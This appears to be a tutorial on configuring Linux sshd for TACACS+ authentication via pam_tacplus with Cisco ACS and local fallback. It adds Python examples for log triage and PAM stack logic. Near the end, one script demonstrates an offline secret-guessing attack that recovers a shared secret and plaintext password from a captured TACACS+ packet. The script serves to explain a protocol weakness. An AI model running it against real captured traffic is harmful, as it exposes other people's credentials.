How to Configure Linux SSH Daemon (sshd) for TACACS+ Authentication with Cisco ACS Fallback



For network engineering teams managing several Linux servers (syslog collectors, configuration backup systems, TFTP servers), authenticating SSH logins against Cisco ACS over TACACS+ gives one place to manage credentials and a per-engineer audit trail, while a local account path remains available for the case where ACS cannot be reached.

First install the build dependencies on CentOS/RHEL and build pam_tacplus from source. The tac_plus package is the TACACS+ daemon, not the client module, and is not needed here; pam-devel and openssl-devel provide the headers the build looks for (the module's packet obfuscation is MD5-based and the build uses OpenSSL for it when the headers are present).


yum install -y pam pam-devel openssl-devel gcc make autoconf automake libtool
wget https://github.com/kravietz/pam_tacplus/archive/v1.5.1.tar.gz
tar xzf v1.5.1.tar.gz
cd pam_tacplus-1.5.1
autoreconf -fi                 # the GitHub archive ships configure.ac, not a generated configure script
./configure --libdir=/lib64    # installs the module as /lib64/security/pam_tacplus.so, the path used below
make
make install

Edit /etc/pam.d/sshd to implement the authentication stack. pam_tacplus has no configuration file of its own: server, shared secret and timeout are passed as arguments on the PAM line. The debug option is useful while testing and should be removed afterwards. Because the shared secret lives in /etc/pam.d/sshd, treat that file as a secret-bearing file: keep it out of world-readable configuration backups and rotate the key if it leaks.


#%PAM-1.0
auth       required     pam_sepermit.so
# TACACS+ first: success ends the auth stack; any failure (reject or no server
# reachable) falls through to the local password-auth stack below.
auth       sufficient   /lib64/security/pam_tacplus.so debug server=acs.example.com secret=shared_key timeout=5
auth       include      password-auth
account    required     pam_nologin.so
account    include      password-auth
password   include      password-auth
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    include      password-auth

There is no /etc/tacplus.conf to create. The server = name { secret = ...  port = 49  timeout = 5 } block syntax is the tac_plus daemon's server-side configuration, and pam_tacplus never reads it. For a primary and a secondary ACS, repeat server= on the PAM line; the servers are tried in the order listed, and each unreachable server costs one timeout before the next is tried. A single secret= applies to every server; if the servers use different keys, give one secret= per server in the same order. Port 49 is the default and needs no option.


auth       sufficient   /lib64/security/pam_tacplus.so server=acs-primary.example.com server=acs-secondary.example.com secret=YourSharedSecret timeout=5

Modify /etc/ssh/sshd_config. pam_tacplus prompts through PAM's conversation function, which sshd exposes as the keyboard-interactive method, so that method must be enabled. Note that AuthenticationMethods keyboard-interactive also disables public-key login for everyone; if engineers use keys as well, list the alternatives separated by a space (AuthenticationMethods publickey keyboard-interactive) or leave the directive out. On OpenSSH 8.7 and later, ChallengeResponseAuthentication is a deprecated alias of KbdInteractiveAuthentication.


UsePAM yes
ChallengeResponseAuthentication yes
AuthenticationMethods keyboard-interactive

Test with a second sshd instance running in the foreground in debug mode on a spare port, so the production daemon keeps serving. The logger line only writes a marker into /var/log/secure so the test attempt is easy to find; the debugging itself comes from sshd -d and from the module's debug option. On an SELinux-enforcing host the extra port must be allowed first, and it must be open in the host firewall.


semanage port -a -t ssh_port_t -p tcp 2222      # SELinux: allow sshd on the test port
logger -p auth.debug -t PAM-TACPLUS "Starting TACACS+ authentication test"
/usr/sbin/sshd -d -p 2222
# then, from another terminal or host:
ssh -o PreferredAuthentications=keyboard-interactive -p 2222 <user>@<server>

Check the system log for the attempt. The module logs under its own syslog identifier rather than as sshd, so match case-insensitively:


tail -f /var/log/secure | grep -i tacplus
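As an added example for the log check (it is not part of the original page or of pam_tacplus), here is a small Python triage over a constructed sample of /var/log/secure lines that does what a plain grep does not: it finds sources with repeated keyboard-interactive/PAM failures inside a time window, lists invalid usernames per source, and flags logins accepted shortly after the module reported every server unreachable, since those must have passed on the local password fallback. The sshd lines follow sshd's actual message format; the PAM-tacplus lines approximate the module's connection-failure message and TACPLUS_RE should be adjusted to what your build logs; the year is an assumption because syslog timestamps carry none.

```python
"""Triage of sshd/PAM lines from /var/log/secure. Added example; the log
lines are constructed. sshd lines follow its real message format, the
PAM-tacplus lines approximate the module's connection-failure message."""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Mar  3 10:15:01 syslog01 sshd[2201]: Failed keyboard-interactive/pam for alice from 10.1.1.5 port 50122 ssh2
Mar  3 10:15:04 syslog01 sshd[2201]: Accepted keyboard-interactive/pam for alice from 10.1.1.5 port 50122 ssh2
Mar  3 10:16:10 syslog01 sshd[2210]: Failed keyboard-interactive/pam for invalid user admin from 203.0.113.9 port 40011 ssh2
Mar  3 10:16:12 syslog01 sshd[2212]: Failed keyboard-interactive/pam for invalid user root from 203.0.113.9 port 40012 ssh2
Mar  3 10:16:15 syslog01 sshd[2214]: Failed keyboard-interactive/pam for bob from 203.0.113.9 port 40013 ssh2
Mar  3 10:16:19 syslog01 sshd[2216]: Failed keyboard-interactive/pam for bob from 203.0.113.9 port 40014 ssh2
Mar  3 10:16:25 syslog01 sshd[2218]: Failed keyboard-interactive/pam for bob from 203.0.113.9 port 40015 ssh2
Mar  3 10:30:00 syslog01 PAM-tacplus[2300]: connection to srv 0 failed
Mar  3 10:30:00 syslog01 PAM-tacplus[2300]: connection to srv 1 failed
Mar  3 10:30:05 syslog01 sshd[2300]: Accepted keyboard-interactive/pam for carol from 10.1.1.7 port 50200 ssh2
"""

TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d)"
SSHD_RE = re.compile(
    TS + r" \S+ sshd\[\d+\]: (?P<result>Accepted|Failed) keyboard-interactive/pam for "
    r"(?P<invalid>invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+ ssh2$")
# Adjust to the exact text your pam_tacplus build logs when a server is down.
TACPLUS_RE = re.compile(TS + r" \S+ PAM-tacplus\[\d+\]: connection to srv \d+ failed$")


def parse_ts(ts, year=2024):
    """syslog timestamps carry no year; the year is an assumption of this example."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def max_in_window(times, window_s):
    """Largest number of events falling inside any window_s-second span."""
    times = sorted(times)
    best, j = 0, 0
    for i in range(len(times)):
        while j + 1 < len(times) and (times[j + 1] - times[i]).total_seconds() <= window_s:
            j += 1
        best = max(best, j - i + 1)
    return best


def triage(log_text, threshold=3, window_s=60):
    """Return brute-force sources, invalid usernames per source, and logins
    accepted within window_s after the module reported a server unreachable."""
    failures, invalid, accepted, outages = defaultdict(list), defaultdict(set), [], []
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts = parse_ts(m["ts"])
            if m["result"] == "Failed":
                failures[m["src"]].append(ts)
                if m["invalid"]:
                    invalid[m["src"]].add(m["user"])
            else:
                accepted.append((ts, m["user"], m["src"]))
            continue
        m = TACPLUS_RE.match(line)
        if m:
            outages.append(parse_ts(m["ts"]))
    brute = {src: n for src, t in failures.items()
             if (n := max_in_window(t, window_s)) >= threshold}
    fallback = [(u, s) for ts, u, s in accepted
                if any(0 <= (ts - o).total_seconds() <= window_s for o in outages)]
    return {"brute_force": brute,
            "invalid_users": {s: sorted(u) for s, u in invalid.items()},
            "accepted_during_outage": fallback}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the sample, the 203.0.113.9 source is reported with five failures in one minute and two invalid usernames, and carol's login is flagged because it was accepted five seconds after both servers were reported down. Point the script at a real file by replacing SAMPLE_LOG with the file contents and tune threshold and window_s to the team's login patterns.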

The sufficient line above falls back to the local password on any TACACS+ failure, including an explicit reject from ACS. That means an engineer whose ACS account has been disabled can still log in with a stale local password until the local account is removed too. To fall back only when no ACS server could be reached, key the fallback on the module's return code instead of using sufficient. The pam_succeed_if line with "service in sshd" from the earlier version of this stack did nothing useful inside /etc/pam.d/sshd (the service is always sshd there, so it skipped pam_tacplus on every login); the version below uses pam_succeed_if for its real purpose, letting a local break-glass group bypass TACACS+. The group name localadmin is an example.


# Members of the local break-glass group skip TACACS+ (jump over the next line).
auth [success=1 default=ignore] pam_succeed_if.so quiet user ingroup localadmin
# ACS accepted -> done; ACS rejected (PAM_AUTH_ERR) -> stop here; no server
# reachable (PAM_AUTHINFO_UNAVAIL) -> continue to the local password.
auth [success=done authinfo_unavail=ignore default=die] /lib64/security/pam_tacplus.so server=acs-primary.example.com server=acs-secondary.example.com secret=shared_key timeout=5
auth required pam_unix.so try_first_pass

This relies on pam_tacplus returning PAM_AUTHINFO_UNAVAIL, not PAM_AUTH_ERR, when every server is unreachable. Verify that with the debug option and a blocked server before depending on it: a build that reports both cases as PAM_AUTH_ERR would lock everyone except the break-glass group out during an ACS outage.
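To make the difference between the two stacks concrete (the condensed sufficient/required stack later on this page behaves like the first one), here is a small Python model of the pam.d(5) control-flag semantics, added as an example rather than taken from Linux-PAM or from the page: it walks each stack with simulated module results for four login situations. Module behaviour is simulated by the SCENARIOS table and the break-glass group check is simulated as a pam_succeed_if result; nothing here calls PAM or ACS.

```python
"""Model of Linux-PAM auth-stack control flow, to compare the fallback stacks
on this page. Added example: a simplified re-implementation of the pam.d(5)
control semantics, not Linux-PAM's code. Module results are simulated."""

SUCCESS, AUTH_ERR, AUTHINFO_UNAVAIL = "success", "auth_err", "authinfo_unavail"

# pam.d(5) shorthand flags expressed as the [value=action] tables they expand to.
SHORTHAND = {
    "required":   {"success": "ok", "new_authtok_reqd": "ok", "ignore": "ignore", "default": "bad"},
    "requisite":  {"success": "ok", "new_authtok_reqd": "ok", "ignore": "ignore", "default": "die"},
    "sufficient": {"success": "done", "new_authtok_reqd": "done", "default": "ignore"},
    "optional":   {"success": "ok", "new_authtok_reqd": "ok", "default": "ignore"},
}

# The page's first stack (sufficient + local fallback) and the return-code-keyed one.
LOOSE_STACK = [("sufficient", "pam_tacplus"), ("required", "pam_unix")]
STRICT_STACK = [("[success=done authinfo_unavail=ignore default=die]", "pam_tacplus"),
                ("required", "pam_unix")]
# Strict stack with a local break-glass group that jumps over pam_tacplus.
BREAKGLASS_STACK = [("[success=1 default=ignore]", "pam_succeed_if")] + STRICT_STACK


def actions_for(control):
    """Action table for a shorthand flag or an explicit [value=action ...] control."""
    if control.startswith("["):
        return dict(item.split("=", 1) for item in control.strip("[]").split())
    return SHORTHAND[control]


def record(result, ret):
    """ok/done/bad/die all let the first failure win: a later return value only
    replaces the running result while that result is still success (or unset)."""
    return ret if result in (None, SUCCESS) else result


def evaluate(stack, outcomes):
    """Walk an auth stack; outcomes maps module name -> simulated PAM return value.
    Returns "allow" or "deny". A stack that records no result at all is denied."""
    result, i = None, 0
    while i < len(stack):
        control, module = stack[i]
        ret = outcomes[module]
        table = actions_for(control)
        action = table.get(ret, table.get("default", "bad"))
        if action == "ignore":
            pass
        elif action in ("ok", "bad"):
            result = record(result, ret)
        elif action == "done":                # ok, then stop the stack
            return "allow" if record(result, ret) == SUCCESS else "deny"
        elif action == "die":                 # bad, then stop the stack
            return "deny"
        elif action.isdigit():                # N: like ok, then skip the next N modules
            result = record(result, ret)
            i += int(action)
        else:
            raise ValueError(f"unsupported action {action!r}")
        i += 1
    return "allow" if result == SUCCESS else "deny"


SCENARIOS = {   # simulated module results for one login attempt
    "ACS accepts, no local password":      {"pam_tacplus": SUCCESS, "pam_unix": AUTH_ERR},
    "ACS rejects, stale local password":   {"pam_tacplus": AUTH_ERR, "pam_unix": SUCCESS},
    "ACS unreachable, local password ok":  {"pam_tacplus": AUTHINFO_UNAVAIL, "pam_unix": SUCCESS},
    "ACS unreachable, local password bad": {"pam_tacplus": AUTHINFO_UNAVAIL, "pam_unix": AUTH_ERR},
}

if __name__ == "__main__":
    for name, outcome in SCENARIOS.items():
        print(f"{name:37} loose={evaluate(LOOSE_STACK, outcome):5} "
              f"strict={evaluate(STRICT_STACK, outcome)}")
```

The second scenario is the one that matters: the loose stack allows the login with the stale local password after ACS said no, the strict stack denies it, and both still allow local passwords during an outage. The break-glass stack shows the jump action doing its job, routing group members straight to pam_unix.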

1. Do not rely on TACACS+ itself for confidentiality. The protocol only obfuscates packet bodies by XORing them with an MD5 keystream derived from the shared secret and cleartext header fields (RFC 8907 section 4.5); there is no TLS, and a guessable secret exposes every password on the wire. Carry TCP/49 over a dedicated management network or an IPsec tunnel and use a long random secret.
2. Rotate the shared secret on a schedule and whenever an administrator who knew it leaves. The secret lives both in ACS and on every server's PAM line, so rotation must update both sides together; per-server secrets keep one leaked server from exposing the rest.
3. Monitor /var/log/secure for failed keyboard-interactive/PAM attempts, for the module's server-unreachable errors, and for logins accepted while ACS was unreachable (those used a local password and deserve a second look).
4. Restrict TCP/49 on the ACS side to the addresses of the Linux servers, and restrict SSH itself to the administrative networks; nothing on the Linux side listens for TACACS+.
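As an added example for item 1 (not code from the page, from pam_tacplus or from Cisco), the Python script below implements the RFC 8907 body obfuscation that TACACS+ uses in place of encryption and then plays attacker: given one captured authentication START packet and a small list of candidate secrets, it recovers the secret and the plaintext password offline, because every input to the MD5 keystream except the secret sits in the cleartext header. The session id, credentials, candidate list and the choice of a PAP-style START (password carried in the first packet) are constructed for the example.

```python
"""TACACS+ body obfuscation (RFC 8907 section 4.5) and an offline secret-guessing
attack against a captured packet. Added example, not the page's or pam_tacplus's
code; the session id, credentials and candidate secrets are constructed."""
import hashlib
import struct

VERSION = 0xC0                   # major version 0xC, minor 0
TYPE_AUTHEN = 0x01
FLAG_UNENCRYPTED = 0x01
HDR = struct.Struct("!BBBBII")   # version, type, seq_no, flags, session_id, length


def pseudo_pad(session_id, key, version, seq_no, length):
    """Keystream: MD5_1 = MD5(session_id|key|version|seq_no),
    MD5_n = MD5(session_id|key|version|seq_no|MD5_{n-1}), concatenated and
    truncated. Everything except key travels in the clear in the header."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body, session_id, key, version=VERSION, seq_no=1):
    """XOR with the pad; applying it twice restores the body."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def authen_start_body(user, password, port="ssh", rem_addr="10.1.1.5"):
    """Authentication START (sec. 5.1) for a PAP login, where the password
    travels in the data field of the first packet: action LOGIN=1, priv_lvl 1,
    authen_type PAP=2, authen_service LOGIN=1, then the four length bytes."""
    u, p, r, d = user.encode(), port.encode(), rem_addr.encode(), password.encode()
    return struct.pack("!8B", 1, 1, 2, 1, len(u), len(p), len(r), len(d)) + u + p + r + d


def build_packet(body, session_id, key, seq_no=1):
    """Header with flags=0 (body obfuscated) followed by the obfuscated body."""
    header = HDR.pack(VERSION, TYPE_AUTHEN, seq_no, 0, session_id, len(body))
    return header + obfuscate(body, session_id, key, VERSION, seq_no)


def parse_packet(packet, key):
    """Return the packet body, de-obfuscated unless the unencrypted flag is set."""
    version, _ptype, seq_no, flags, session_id, length = HDR.unpack_from(packet)
    body = packet[HDR.size:HDR.size + length]
    if flags & FLAG_UNENCRYPTED:
        return body
    return obfuscate(body, session_id, key, version, seq_no)


def recover_with_key_guess(packet, candidates):
    """Offline attack on a captured START packet: try candidate secrets until the
    decoded body is self-consistent (length fields add up, text decodes as ASCII).
    Returns (key, user, password) or None. A weak shared secret makes this cheap."""
    for key in candidates:
        body = parse_packet(packet, key)
        if len(body) < 8:
            continue
        ulen, plen, rlen, dlen = body[4:8]
        if 8 + ulen + plen + rlen + dlen != len(body):
            continue
        try:
            user = body[8:8 + ulen].decode("ascii")
            password = body[8 + ulen + plen + rlen:].decode("ascii")
        except UnicodeDecodeError:
            continue
        return key, user, password
    return None


if __name__ == "__main__":
    capture = build_packet(authen_start_body("alice", "Winter2024!"), 0x1234ABCD, b"cisco123")
    print(recover_with_key_guess(capture, [b"secret", b"tacacs", b"cisco123"]))
```

The attack is nothing more than the protocol's own decoder run in a loop, which is why the secret's entropy and the isolation of the management network are what actually protect the passwords passing between the servers and ACS.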


The condensed variant below covers the same setup with a minimal PAM stack, using IP addresses and the 1.4.0 release, and adds authorization, accounting and multiple-server examples.

# Required packages on CentOS/RHEL (tac_plus itself is the daemon and is not needed)
yum install -y pam pam-devel openssl-devel gcc make autoconf automake libtool
wget https://github.com/kravietz/pam_tacplus/archive/v1.4.0.tar.gz
tar xzf v1.4.0.tar.gz
cd pam_tacplus-1.4.0
autoreconf -fi                 # no generated configure script in the GitHub archive
./configure --libdir=/lib64    # module ends up in /lib64/security, as referenced below
make
make install

There is no client-side configuration file to create: /etc/tacacs+/tac_plus.conf is the tac_plus daemon's file, and pam_tacplus does not read it. The server address, shared secret and timeout go on the PAM line. Edit /etc/pam.d/sshd:

# TACACS+ with local fallback; timeout is the per-server wait in seconds
auth sufficient /lib64/security/pam_tacplus.so server=192.168.1.10 secret=your_shared_secret timeout=10
# try_first_pass reuses the password pam_tacplus already collected instead of
# prompting again. Do not add nullok: it would let local accounts with an
# empty password log in whenever TACACS+ fails.
auth required pam_unix.so try_first_pass
account required pam_unix.so

Ensure these lines exist in /etc/ssh/sshd_config. PasswordAuthentication may stay on: with UsePAM yes the password method also runs the PAM stack, so pam_tacplus sees the password either way.

UsePAM yes
ChallengeResponseAuthentication yes
PasswordAuthentication yes

Test the PAM stack directly, without sshd. pamtester is packaged in EPEL; run it as root so that pam_unix can verify other users' passwords during the fallback.

# Test authentication
pamtester sshd username authenticate

# Check logs
tail -f /var/log/secure

For authorization and accounting, add the module to the account and session stacks as well. A service= value is required for these calls; service=shell is the service name ACS shell profiles use. As with the auth stack, confirm with the debug option which return code your build gives when every server is unreachable before relying on the fallback.

# Authorization: ask ACS for a shell profile. A reject is final; an unreachable
# server falls through to the local account checks.
account [success=done authinfo_unavail=ignore default=bad] /lib64/security/pam_tacplus.so server=192.168.1.10 secret=your_shared_secret service=shell
account required pam_unix.so
# Accounting: START/STOP records for every SSH session
session optional /lib64/security/pam_tacplus.so server=192.168.1.10 secret=your_shared_secret service=shell

Privilege level is an attribute the TACACS+ server returns in the shell authorization reply. It is defined on the server (an ACS shell profile, or for a test tac_plus daemon a group block like the one below), not on the Linux host, and the Linux side does nothing with priv-lvl by itself: what the user may do on the server is still decided by the local account, its groups and sudoers. The group name is an example.

# In tac_plus.conf on the TACACS+ server (Shrubbery tac_plus syntax)
group = netadmins {
    service = shell {
        default attribute = permit
        set priv-lvl = 15
    }
}

For multiple ACS servers, repeat server= on the PAM line; they are tried in the order given, and each unreachable server costs one timeout before the next is tried:

# Multiple server configuration (one PAM line)
auth sufficient /lib64/security/pam_tacplus.so server=192.168.1.10 server=192.168.1.11 server=192.168.1.12 secret=your_shared_secret timeout=5